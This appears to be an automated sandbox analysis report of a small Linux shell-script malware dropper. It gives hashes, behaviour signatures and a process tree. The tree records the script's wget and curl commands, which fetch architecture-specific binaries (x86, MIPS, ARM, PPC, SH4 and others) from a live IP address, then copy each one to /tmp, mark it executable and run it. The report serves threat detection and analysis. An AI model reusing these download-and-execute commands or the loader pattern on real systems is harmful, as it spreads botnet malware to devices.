Analysis
- max time kernel: 25s
- max time network: 128s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 24/11/2024, 01:19
Static task
- static1
Behavioral tasks
- behavioral1: sample 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh, resource debian9-armhf-20240611-en
- behavioral3: sample 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh, resource debian9-mipsel-20240226-en
General
- Target: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
- Size: 1KB
- MD5: 513641f5f60d55559c2060489de6d605
- SHA1: c95feec2255732b60d434b0639b88a5cff205ea0
- SHA256: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
- SHA512: 71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 10 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid   Process
  1549  chmod
  1555  chmod
  1561  chmod
  1567  chmod
  1573  chmod
  1579  chmod
  1525  chmod
  1531  chmod
  1537  chmod
  1543  chmod
- Executes dropped EXE (10 IoCs)
  ioc        pid   Process
  /tmp/3AvA  1526  3AvA
  /tmp/3AvA  1532  3AvA
  /tmp/3AvA  1538  3AvA
  /tmp/3AvA  1544  3AvA
  /tmp/3AvA  1550  3AvA
  /tmp/3AvA  1556  3AvA
  /tmp/3AvA  1562  3AvA
  /tmp/3AvA  1568  3AvA
  /tmp/3AvA  1574  3AvA
  /tmp/3AvA  1580  3AvA
- System Network Configuration Discovery (1 TTPs, 4 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid   Process
  1532  3AvA
  1528  wget
  1529  curl
  1530  cat
- Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  description                   ioc        Process
  File opened for modification  /tmp/3AvA  1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Processes
- /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh: /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh (PID 1517)
  - Writes file to tmp directory
  - /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.x86 (PID 1518)
  - /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.x86 (PID 1520)
  - /bin/cat: cat UnHAnaAW.x86 (PID 1524)
  - /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4 (PID 1525)
    - File and Directory Permissions Modification
  - /tmp/3AvA: ./3AvA x86 (PID 1526)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.mips (PID 1528)
    - System Network Configuration Discovery
  - /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.mips (PID 1529)
    - System Network Configuration Discovery
  - /bin/cat: cat UnHAnaAW.mips (PID 1530)
    - System Network Configuration Discovery
  - /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4 (PID 1531)
    - File and Directory Permissions Modification
  - /tmp/3AvA: ./3AvA mips (PID 1532)
    - Executes dropped EXE
    - System Network Configuration Discovery
  - /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.mpsl (PID 1534)
  - /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl (PID 1535)
  - /bin/cat: cat UnHAnaAW.mpsl (PID 1536)
  - /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4 (PID 1537)
    - File and Directory Permissions Modification
  - /tmp/3AvA: ./3AvA mpsl (PID 1538)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm4 (PID 1540)
  - /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm4 (PID 1541)
  - /bin/cat: cat UnHAnaAW.arm4 (PID 1542)
  - /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4 (PID 1543)
    - File and Directory Permissions Modification
  - /tmp/3AvA: ./3AvA arm4 (PID 1544)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm5 (PID 1546)
  - /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm5 (PID 1547)
  - /bin/cat: cat UnHAnaAW.arm5 (PID 1548)
  - /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4 (PID 1549)
    - File and Directory Permissions Modification
  - /tmp/3AvA: ./3AvA arm5 (PID 1550)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm6 (PID 1552)
  - /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm6 (PID 1553)
  - /bin/cat: cat UnHAnaAW.arm6 (PID 1554)
  - /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4 (PID 1555)
    - File and Directory Permissions Modification
  - /tmp/3AvA: ./3AvA arm6 (PID 1556)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.arm7 (PID 1558)
  - /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.arm7 (PID 1559)
  - /bin/cat: cat UnHAnaAW.arm7 (PID 1560)
  - /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4 (PID 1561)
    - File and Directory Permissions Modification
  - /tmp/3AvA: ./3AvA arm7 (PID 1562)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.ppc (PID 1564)
  - /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.ppc (PID 1565)
  - /bin/cat: cat UnHAnaAW.ppc (PID 1566)
  - /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4 (PID 1567)
    - File and Directory Permissions Modification
  - /tmp/3AvA: ./3AvA ppc (PID 1568)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.m68k (PID 1570)
  - /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.m68k (PID 1571)
  - /bin/cat: cat UnHAnaAW.m68k (PID 1572)
  - /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4 (PID 1573)
    - File and Directory Permissions Modification
  - /tmp/3AvA: ./3AvA m68k (PID 1574)
    - Executes dropped EXE
  - /usr/bin/wget: wget http://89.22.230.162/bins/UnHAnaAW.sh4 (PID 1576)
  - /usr/bin/curl: curl -O http://89.22.230.162/bins/UnHAnaAW.sh4 (PID 1577)
  - /bin/cat: cat UnHAnaAW.sh4 (PID 1578)
  - /bin/chmod: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4 (PID 1579)
    - File and Directory Permissions Modification
  - /tmp/3AvA: ./3AvA sh4 (PID 1580)
    - Executes dropped EXE